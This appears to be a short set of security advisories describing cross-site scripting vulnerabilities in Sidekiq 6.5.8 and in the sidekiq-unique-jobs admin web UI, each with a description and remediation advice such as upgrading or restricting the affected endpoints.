Pboling

**Name of the Vulnerable Software and Affected Versions** Contribsys Sidekiq version 6.5.8 **Description** The issue allows a remote attacker to obtain sensitive information via a crafted URL to the filter functions. This is a Cross Site Scripting vulnerability. **Recommendations** For Contribsys Sidekiq version 6.5.8, update to a version that fixes this issue, as the current version allows remote attackers to obtain sensitive information. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Contribsys Sidekiq version 6.5.8 **Description** The issue allows a remote attacker to obtain sensitive information via a crafted payload to the `uniquejobs` function. This is a Cross Site Scripting vulnerability. **Recommendations** For Contribsys Sidekiq version 6.5.8, consider disabling the `uniquejobs` function until a patch is available to prevent exploitation.

**Name of the Vulnerable Software and Affected Versions** sidekiq-unique-jobs versions prior to 7.1.33 and 8.0.7 **Description** The issue is related to a Cross-Site Scripting (XSS) vulnerability in the sidekiq-unique-jobs "admin" web UI. Specially crafted GET request parameters handled by the following endpoints can allow a super-user attacker or an unwitting, authorized victim to execute malicious code, potentially stealing cookies, session data, or local storage data: "/changelogs", "/locks", or "/expiring locks". This vulnerability can impact many thousands of sites, as sidekiq-unique-jobs is widely deployed across the industry. **Recommendations** To resolve the issue, upgrade to version 7.1.33 or 8.0.7. As a temporary workaround, consider restricting access to the vulnerable endpoints "/changelogs", "/locks", and "/expiring locks" until a patch is available. Additionally, configuring authorization constraints on the "admin" UI can help minimize the risk of exploitation.